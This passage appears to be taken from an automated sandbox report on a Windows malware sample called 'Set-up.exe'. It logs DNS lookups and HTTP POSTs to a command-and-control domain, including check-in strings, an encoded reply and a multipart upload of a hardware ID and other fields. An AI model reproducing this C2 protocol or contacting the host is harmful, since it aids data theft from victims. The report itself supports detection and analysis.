                                                                                                                      Jan 5, 2025 18:53:45.911498070 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.911588907 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:45.911643028 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.912199974 CET49875443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:45.912211895 CET44349875172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.456536055 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.456567049 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.456661940 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.456975937 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.456984997 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.922677040 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.922775984 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.924259901 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.924266100 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.924493074 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.925961971 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.926919937 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.926954031 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.927119017 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.927148104 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.927261114 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.927305937 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.927634001 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.927661896 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.928067923 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.928098917 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.928584099 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.928613901 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.928623915 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.928637981 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.928769112 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.928793907 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.928812027 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.928992987 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.929023027 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.937340021 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.937539101 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.937567949 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:46.937597036 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.937639952 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:46.944581985 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.576553106 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.576653004 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.576709032 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:48.576900959 CET49884443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:48.576917887 CET44349884172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.585688114 CET49900443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:48.585710049 CET44349900172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.585791111 CET49900443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:48.586107016 CET49900443192.168.2.6172.67.178.174
                                                                                                                      Jan 5, 2025 18:53:48.586117983 CET44349900172.67.178.174192.168.2.6
                                                                                                                      Jan 5, 2025 18:53:48.713395119 CET49900443192.168.2.6172.67.178.174
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 5, 2025 18:53:28.751801968 CET5884553192.168.2.61.1.1.1
                                                                                                                      Jan 5, 2025 18:53:28.777117014 CET53588451.1.1.1192.168.2.6
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Jan 5, 2025 18:53:28.751801968 CET192.168.2.61.1.1.10x8eefStandard query (0)passhudmrue.clickA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Jan 5, 2025 18:53:28.777117014 CET1.1.1.1192.168.2.60x8eefNo error (0)passhudmrue.click172.67.178.174A (IP address)IN (0x0001)false
                                                                                                                      Jan 5, 2025 18:53:28.777117014 CET1.1.1.1192.168.2.60x8eefNo error (0)passhudmrue.click104.21.31.168A (IP address)IN (0x0001)false
                                                                                                                      • passhudmrue.click
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.649769172.67.178.1744433940C:\Users\user\Desktop\'Set-up.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-05 17:53:29 UTC264OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 8
                                                                                                                      Host: passhudmrue.click
                                                                                                                      2025-01-05 17:53:29 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                      Data Ascii: act=life
                                                                                                                      2025-01-05 17:53:30 UTC1140INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 05 Jan 2025 17:53:30 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=e2i7vegbid0kk98tru1pe616c2; expires=Thu, 01 May 2025 11:40:08 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Frame-Options: DENY
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4uRDgM%2FSiFIQ4axeSbduq6dCs537BFtdS46N4Z0aS%2FVCcN4oApOzC%2F46k1UPkbClGcEL3AcowfvEJH%2FtB6An4k3TZYx%2BVqeFXpl6IUXvtNoff%2BvwenG6%2BA5YdkjqtJXYSk4DPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fd553fecabd0f80-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=18851&min_rtt=1654&rtt_var=10935&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1765417&cwnd=207&unsent_bytes=0&cid=5dabfb3a0eb22fa3&ts=783&x=0"
                                                                                                                      2025-01-05 17:53:30 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                      Data Ascii: 2ok
                                                                                                                      2025-01-05 17:53:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.649778172.67.178.1744433940C:\Users\user\Desktop\'Set-up.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-05 17:53:31 UTC265OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 78
                                                                                                                      Host: passhudmrue.click
                                                                                                                      2025-01-05 17:53:31 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--DRON&j=637b55279021aab33278188cfa638397
                                                                                                                      2025-01-05 17:53:31 UTC1132INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 05 Jan 2025 17:53:31 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=flniqcaeuqkp46p41tjp1ha5vr; expires=Thu, 01 May 2025 11:40:10 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      X-Frame-Options: DENY
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2BSYa8qKQ97T%2F9FRJSE8JgN9rXHkjpLJwKbBi4pMyDXkZVm8AIAAmeMpFch3y8iIsAGTTvSZuU5v%2FjEOjc75EDfCFVb2Fz5lu9%2BbIhAToJ3dPUlyyTyMV6eEVJ3f0N20LY0Fyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fd5540b080041e6-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1549&rtt_var=593&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=979&delivery_rate=1825000&cwnd=182&unsent_bytes=0&cid=a81faee5a585ac26&ts=1213&x=0"
                                                                                                                      2025-01-05 17:53:31 UTC237INData Raw: 31 63 61 39 0d 0a 52 53 34 6f 44 38 34 37 72 6a 63 58 57 39 32 4f 4c 31 79 57 35 46 43 4e 41 31 35 71 64 71 58 78 50 32 67 2f 48 46 35 55 43 68 6b 2b 44 46 34 74 39 41 2b 43 46 57 51 2b 2f 37 52 62 4c 75 4f 42 66 4b 39 69 4f 6b 68 4d 77 35 42 54 47 31 6f 77 66 43 4a 6e 4f 33 39 49 53 57 4f 39 58 6f 49 56 63 69 50 2f 74 48 51 6e 74 49 45 2b 72 7a 6c 38 44 78 7a 48 6b 46 4d 4b 58 6e 63 78 4a 47 5a 36 4c 55 4a 50 5a 36 74 59 79 6c 5a 37 4e 72 6a 72 53 6a 33 38 69 6a 6e 67 61 7a 4e 49 57 6f 65 55 52 55 6f 46 50 68 4d 78 66 6e 67 49 54 31 74 6b 37 45 61 43 54 44 55 2b 73 36 77 56 66 76 65 42 4d 75 46 6c 4f 67 45 65 7a 5a 6c 62 43 31 74 32 4c 6a 31 73 63 53 31 4d 54 47 61 68 55 64 35 62 63 54 47 7a 37 55 41
                                                                                                                      Data Ascii: 1ca9RS4oD847rjcXW92OL1yW5FCNA15qdqXxP2g/HF5UChk+DF4t9A+CFWQ+/7RbLuOBfK9iOkhMw5BTG1owfCJnO39ISWO9XoIVciP/tHQntIE+rzl8DxzHkFMKXncxJGZ6LUJPZ6tYylZ7NrjrSj38ijngazNIWoeURUoFPhMxfngIT1tk7EaCTDU+s6wVfveBMuFlOgEezZlbC1t2Lj1scS1MTGahUd5bcTGz7UA
                                                                                                                      2025-01-05 17:53:31 UTC1369INData Raw: 39 74 4d 68 79 36 48 6c 38 55 46 53 55 6f 56 34 62 54 47 73 78 4a 6d 34 37 4f 41 4a 54 4c 61 74 56 6a 41 30 31 4d 62 50 69 53 44 33 37 67 54 50 76 63 7a 4d 49 46 38 2b 62 57 51 42 53 63 54 4d 34 59 6e 77 76 52 55 31 69 71 31 48 4b 57 6e 5a 35 38 61 78 4b 4a 72 54 65 63 73 39 78 50 77 73 41 79 6f 49 64 46 52 4e 6e 66 44 46 6b 4f 33 38 4d 54 47 4f 74 56 4d 78 48 66 54 4b 30 36 56 38 31 2f 59 73 2f 37 32 77 32 42 78 66 48 6c 46 63 41 55 6e 51 34 4f 32 56 39 4a 30 77 4b 49 2b 78 65 31 42 55 74 65 5a 7a 70 58 54 6e 34 6b 48 44 56 49 53 4e 47 44 59 65 55 55 55 6f 46 50 6a 51 7a 61 33 67 73 51 30 6c 6c 70 30 76 4d 52 33 4d 30 75 76 35 4c 4f 2f 71 4d 4d 66 31 72 4d 67 34 58 7a 70 68 55 44 31 70 36 66 48 67 6f 66 44 38 4d 45 69 32 4e 56 4d 64 5a 66 79 36 2f 72 46
                                                                                                                      Data Ascii: 9tMhy6Hl8UFSUoV4bTGsxJm47OAJTLatVjA01MbPiSD37gTPvczMIF8+bWQBScTM4YnwvRU1iq1HKWnZ58axKJrTecs9xPwsAyoIdFRNnfDFkO38MTGOtVMxHfTK06V81/Ys/72w2BxfHlFcAUnQ4O2V9J0wKI+xe1BUteZzpXTn4kHDVISNGDYeUUUoFPjQza3gsQ0llp0vMR3M0uv5LO/qMMf1rMg4XzphUD1p6fHgofD8MEi2NVMdZfy6/rF
                                                                                                                      2025-01-05 17:53:31 UTC1369INData Raw: 50 76 31 74 4e 67 34 62 79 70 38 64 52 42 31 35 4a 48 59 77 4f 77 31 50 58 6d 36 6d 47 2f 6c 57 65 7a 65 34 2b 67 30 68 75 70 39 79 36 47 31 38 55 46 54 4b 6b 6c 55 4d 54 33 45 78 4e 57 5a 31 4b 45 6c 46 5a 61 78 5a 77 56 42 78 4d 72 54 76 51 44 72 6d 6a 44 4c 6e 5a 44 30 43 48 6f 66 64 48 51 31 46 50 6d 52 32 57 57 77 73 44 6e 39 75 6f 6c 66 4c 51 7a 55 6d 38 66 55 4e 4f 66 6a 47 61 71 39 73 4e 41 30 52 79 4a 4a 58 42 46 68 30 4d 44 35 6d 65 44 56 44 54 6d 32 67 55 63 5a 59 65 7a 32 33 35 55 59 31 38 6f 59 7a 35 53 46 79 53 42 50 66 30 77 56 4b 61 58 6b 77 4f 32 63 35 45 6b 39 45 59 36 74 50 6a 45 6f 37 49 50 2f 72 51 58 36 73 78 6a 37 6d 59 54 63 43 45 4d 65 55 55 41 39 65 65 54 38 37 62 33 45 70 53 30 35 68 70 56 54 4b 56 58 49 39 75 76 35 49 4e 2f 69
                                                                                                                      Data Ascii: Pv1tNg4byp8dRB15JHYwOw1PXm6mG/lWeze4+g0hup9y6G18UFTKklUMT3ExNWZ1KElFZaxZwVBxMrTvQDrmjDLnZD0CHofdHQ1FPmR2WWwsDn9uolfLQzUm8fUNOfjGaq9sNA0RyJJXBFh0MD5meDVDTm2gUcZYez235UY18oYz5SFySBPf0wVKaXkwO2c5Ek9EY6tPjEo7IP/rQX6sxj7mYTcCEMeUUA9eeT87b3EpS05hpVTKVXI9uv5IN/i
                                                                                                                      2025-01-05 17:53:31 UTC1369INData Raw: 79 70 49 43 34 6d 4b 48 51 31 52 50 6d 52 32 59 58 49 31 51 6b 52 6b 6f 56 2f 45 55 6e 73 30 74 4f 70 47 4f 66 4f 41 50 2b 64 73 4f 51 73 56 77 35 6c 50 43 56 5a 30 4d 54 77 6f 4e 57 64 4c 55 69 33 30 47 65 74 5a 58 43 6d 6b 2f 6c 74 2b 36 38 67 72 72 32 59 77 53 45 79 48 6b 46 49 44 55 6e 59 30 4f 57 64 2f 4b 55 70 4d 59 4b 6c 57 78 6b 64 39 4e 37 4c 6e 51 6a 58 6d 68 6a 2f 72 62 54 67 41 48 38 33 54 45 30 70 61 5a 6e 78 75 4b 45 34 71 51 30 70 75 75 68 6e 54 47 32 78 35 75 4f 41 4e 5a 72 53 4b 50 4f 39 75 4d 41 51 66 7a 35 4a 52 42 46 70 37 4e 54 35 67 61 53 5a 49 51 6d 79 69 56 73 31 52 63 44 79 37 36 30 6b 34 2b 38 5a 38 72 32 59 6b 53 45 79 48 76 48 6f 2f 48 31 38 47 64 6e 63 31 50 67 78 4e 59 65 77 42 6a 46 6c 32 4e 62 66 6a 53 7a 66 34 6a 44 76 6b
                                                                                                                      Data Ascii: ypIC4mKHQ1RPmR2YXI1QkRkoV/EUns0tOpGOfOAP+dsOQsVw5lPCVZ0MTwoNWdLUi30GetZXCmk/lt+68grr2YwSEyHkFIDUnY0OWd/KUpMYKlWxkd9N7LnQjXmhj/rbTgAH83TE0paZnxuKE4qQ0puuhnTG2x5uOANZrSKPO9uMAQfz5JRBFp7NT5gaSZIQmyiVs1RcDy760k4+8Z8r2YkSEyHvHo/H18Gdnc1PgxNYewBjFl2NbfjSzf4jDvk
                                                                                                                      2025-01-05 17:53:31 UTC1369INData Raw: 44 45 6c 31 67 46 58 48 38 36 4a 47 39 79 4e 55 4a 48 59 71 52 52 78 56 52 78 50 4c 4c 71 51 54 54 31 67 54 7a 68 61 58 78 47 56 4d 43 4c 48 56 49 64 58 79 77 74 65 6d 30 71 62 55 64 69 37 45 61 43 54 44 55 2b 73 36 77 56 66 76 32 55 4e 75 4a 7a 4e 51 38 61 79 4a 42 50 43 31 42 31 4c 6a 46 6e 66 79 42 41 54 47 4b 71 57 4d 6c 66 65 54 36 36 35 30 49 79 74 4d 68 79 36 48 6c 38 55 46 54 70 6d 45 34 64 58 6e 41 33 49 48 4d 37 4f 41 4a 54 4c 61 74 56 6a 41 30 31 4f 72 54 6e 53 54 37 34 68 6a 62 69 59 53 34 48 45 38 43 61 56 68 68 58 65 54 73 39 59 48 41 6f 53 6c 68 68 6f 6b 76 4a 52 32 64 35 38 61 78 4b 4a 72 54 65 63 74 6c 6d 4c 42 67 58 68 61 4a 4c 43 55 74 31 4d 54 6f 6f 5a 47 6c 56 43 6d 71 67 47 5a 51 56 63 7a 61 32 37 30 49 2f 2f 59 6f 2f 36 6d 67 35 43
                                                                                                                      Data Ascii: DEl1gFXH86JG9yNUJHYqRRxVRxPLLqQTT1gTzhaXxGVMCLHVIdXywtem0qbUdi7EaCTDU+s6wVfv2UNuJzNQ8ayJBPC1B1LjFnfyBATGKqWMlfeT6650IytMhy6Hl8UFTpmE4dXnA3IHM7OAJTLatVjA01OrTnST74hjbiYS4HE8CaVhhXeTs9YHAoSlhhokvJR2d58axKJrTectlmLBgXhaJLCUt1MTooZGlVCmqgGZQVcza270I//Yo/6mg5C
                                                                                                                      2025-01-05 17:53:31 UTC1369INData Raw: 54 4f 46 35 6c 66 43 6b 6d 59 6d 64 4c 52 69 33 30 47 63 39 53 64 6a 69 31 35 55 45 78 38 34 49 67 35 57 59 75 43 52 58 4d 6e 6c 45 4b 55 48 4d 32 4e 32 46 32 4b 30 46 4e 61 71 4e 63 6a 42 73 31 50 71 65 73 46 58 37 56 69 7a 6e 6a 4f 6d 5a 49 43 34 6d 4b 48 51 31 52 50 6d 52 32 61 48 45 69 52 6b 64 75 6f 31 72 65 56 48 4d 72 76 2b 46 48 4c 50 36 4e 4e 2b 4a 73 4d 51 73 53 77 5a 68 52 47 46 52 2b 50 7a 30 6f 4e 57 64 4c 55 69 33 30 47 65 39 43 59 7a 4f 34 34 46 73 31 39 59 55 6b 34 6e 46 38 52 6c 54 57 6c 45 78 4b 42 57 67 73 49 57 39 6b 61 56 55 4b 61 71 41 5a 6c 42 56 7a 4d 4c 6e 72 53 7a 44 6d 67 7a 54 67 62 6a 55 42 45 4d 2b 51 58 51 35 5a 65 54 6b 31 5a 48 41 67 54 30 56 70 70 56 66 46 57 6a 56 33 2f 2b 74 56 66 71 7a 47 45 2f 52 69 4d 41 56 55 32 4e
                                                                                                                      Data Ascii: TOF5lfCkmYmdLRi30Gc9Sdji15UEx84Ig5WYuCRXMnlEKUHM2N2F2K0FNaqNcjBs1PqesFX7ViznjOmZIC4mKHQ1RPmR2aHEiRkduo1reVHMrv+FHLP6NN+JsMQsSwZhRGFR+Pz0oNWdLUi30Ge9CYzO44Fs19YUk4nF8RlTWlExKBWgsIW9kaVUKaqAZlBVzMLnrSzDmgzTgbjUBEM+QXQ5ZeTk1ZHAgT0VppVfFWjV3/+tVfqzGE/RiMAVU2N
                                                                                                                      2025-01-05 17:53:31 UTC263INData Raw: 4d 48 77 78 63 44 74 2f 44 47 70 6d 75 6c 7a 4c 51 7a 63 4d 76 4f 4a 44 4f 65 4c 47 4c 64 41 76 66 41 6c 55 6e 36 70 45 53 6b 73 2b 5a 47 51 6d 4f 7a 55 4d 45 69 33 72 57 74 35 48 63 7a 71 70 37 77 6f 41 79 71 45 6b 35 57 59 73 44 77 50 49 30 78 4e 4b 55 6a 35 6b 44 79 68 79 49 46 64 62 65 36 46 4a 79 78 56 4b 64 2f 2f 30 44 57 61 30 73 7a 48 68 62 7a 73 65 42 59 71 30 53 77 42 61 62 6a 73 68 5a 7a 74 70 44 45 77 74 39 41 71 43 46 58 45 6f 2f 37 51 64 62 4b 2f 54 59 62 67 78 62 68 64 61 33 74 4e 4c 53 67 55 73 63 6e 5a 36 4f 33 38 4d 44 57 36 2b 53 38 70 57 59 7a 72 34 30 6e 4d 5a 37 6f 73 30 2b 48 41 43 4e 68 50 64 6e 6c 73 64 54 44 49 70 4e 57 5a 31 49 46 6f 4b 49 2b 78 57 6a 41 31 4d 65 66 65 73 63 6e 43 30 6e 6e 4b 33 49 51 6b 4c 47 73 6d 55 53 78 73
                                                                                                                      Data Ascii: MHwxcDt/DGpmulzLQzcMvOJDOeLGLdAvfAlUn6pESks+ZGQmOzUMEi3rWt5Hczqp7woAyqEk5WYsDwPI0xNKUj5kDyhyIFdbe6FJyxVKd//0DWa0szHhbzseBYq0SwBabjshZztpDEwt9AqCFXEo/7QdbK/TYbgxbhda3tNLSgUscnZ6O38MDW6+S8pWYzr40nMZ7os0+HACNhPdnlsdTDIpNWZ1IFoKI+xWjA1MefescnC0nnK3IQkLGsmUSxs
                                                                                                                      2025-01-05 17:53:31 UTC1369INData Raw: 33 32 62 36 0d 0a 6d 77 32 44 41 51 74 71 68 6d 55 42 54 74 35 75 2f 30 4e 5a 71 54 55 61 62 6f 79 61 31 68 47 32 4e 31 45 53 6b 73 2b 5a 47 51 6d 4f 7a 55 4d 45 69 33 72 57 74 35 48 63 7a 71 70 37 77 6f 41 79 71 67 31 36 57 51 37 47 46 62 70 6d 45 6b 4e 48 54 42 38 4f 53 67 6a 48 67 77 43 4c 5a 4d 58 6a 45 30 31 59 66 2f 5a 54 6a 44 36 67 53 54 2b 4c 42 49 50 45 73 4b 55 54 55 68 7a 64 53 67 78 4b 44 56 6e 53 67 6f 31 2f 42 65 4d 55 57 52 35 35 37 77 66 5a 61 48 56 5a 62 38 7a 49 30 59 4e 68 34 55 64 55 67 38 77 66 43 51 6f 49 32 63 4c 53 58 2b 2b 58 38 39 44 64 6e 36 42 30 6b 34 6f 2b 59 6b 35 37 6c 38 43 4a 68 6e 47 6b 46 4e 49 62 47 67 78 4a 6d 74 2b 49 48 4a 30 59 36 74 4e 79 31 74 7a 4f 66 2b 69 44 54 47 30 33 67 75 76 4b 58 77 33 57 6f 65 4c 48 56
                                                                                                                      Data Ascii: 32b6mw2DAQtqhmUBTt5u/0NZqTUaboya1hG2N1ESks+ZGQmOzUMEi3rWt5Hczqp7woAyqg16WQ7GFbpmEkNHTB8OSgjHgwCLZMXjE01Yf/ZTjD6gST+LBIPEsKUTUhzdSgxKDVnSgo1/BeMUWR557wfZaHVZb8zI0YNh4UdUg8wfCQoI2cLSX++X89Ddn6B0k4o+Yk57l8CJhnGkFNIbGgxJmt+IHJ0Y6tNy1tzOf+iDTG03guvKXw3WoeLHV
                                                                                                                      2025-01-05 17:53:31 UTC1369INData Raw: 5a 6a 70 6b 61 56 55 4b 65 2b 77 42 6e 68 73 31 4b 2f 2b 30 44 58 6e 33 6c 43 44 70 59 69 6f 4c 55 2f 6d 74 65 67 52 61 66 79 6f 6d 5a 58 63 47 54 31 74 6e 6b 6d 66 5a 56 6e 73 33 75 50 70 63 66 72 72 47 50 61 38 35 42 55 68 63 68 36 77 54 53 6b 55 2b 5a 48 5a 64 65 43 6c 43 54 58 75 39 46 4f 74 62 63 6a 69 70 2f 45 41 79 31 59 55 6a 35 53 46 79 53 42 4b 48 79 77 39 45 48 58 6f 74 64 6a 41 72 64 52 63 66 50 76 73 4a 6e 6b 6f 37 49 50 2f 36 44 57 61 6d 79 48 4c 39 49 57 52 49 55 38 53 42 54 77 78 65 61 44 39 78 56 6b 55 43 57 30 6c 39 71 6c 72 79 61 31 34 31 75 65 74 58 4f 66 4b 67 45 71 38 76 66 41 64 55 6e 36 6f 64 51 68 31 42 63 6e 5a 77 4f 33 38 4d 66 32 36 69 56 38 74 44 5a 48 53 61 2b 30 34 75 38 6f 56 79 6f 53 45 36 53 45 79 58 33 52 30 4f 54 44 35
                                                                                                                      Data Ascii: ZjpkaVUKe+wBnhs1K/+0DXn3lCDpYioLU/mtegRafyomZXcGT1tnkmfZVns3uPpcfrrGPa85BUhch6wTSkU+ZHZdeClCTXu9FOtbcjip/EAy1YUj5SFySBKHyw9EHXotdjArdRcfPvsJnko7IP/6DWamyHL9IWRIU8SBTwxeaD9xVkUCW0l9qlrya141uetXOfKgEq8vfAdUn6odQh1BcnZwO38Mf26iV8tDZHSa+04u8oVyoSE6SEyX3R0OTD5


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.649788172.67.178.1744433940C:\Users\user\Desktop\'Set-up.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-05 17:53:32 UTC284OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: multipart/form-data; boundary=EORV0HD9UWAKJ2L405H
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 12864
                                                                                                                      Host: passhudmrue.click
                                                                                                                      2025-01-05 17:53:32 UTC12864OUTData Raw: 2d 2d 45 4f 52 56 30 48 44 39 55 57 41 4b 4a 32 4c 34 30 35 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 41 32 31 35 44 30 37 43 42 37 37 46 38 46 45 32 31 32 43 43 34 42 33 32 41 33 45 36 44 43 0d 0a 2d 2d 45 4f 52 56 30 48 44 39 55 57 41 4b 4a 32 4c 34 30 35 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 4f 52 56 30 48 44 39 55 57 41 4b 4a 32 4c 34 30 35 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52
                                                                                                                      Data Ascii: --EORV0HD9UWAKJ2L405HContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--EORV0HD9UWAKJ2L405HContent-Disposition: form-data; name="pid"2--EORV0HD9UWAKJ2L405HContent-Disposition: form-data; name="lid"hRjzG3--DR
                                                                                                                      2025-01-05 17:53:33 UTC1130INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 05 Jan 2025 17:53:33 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
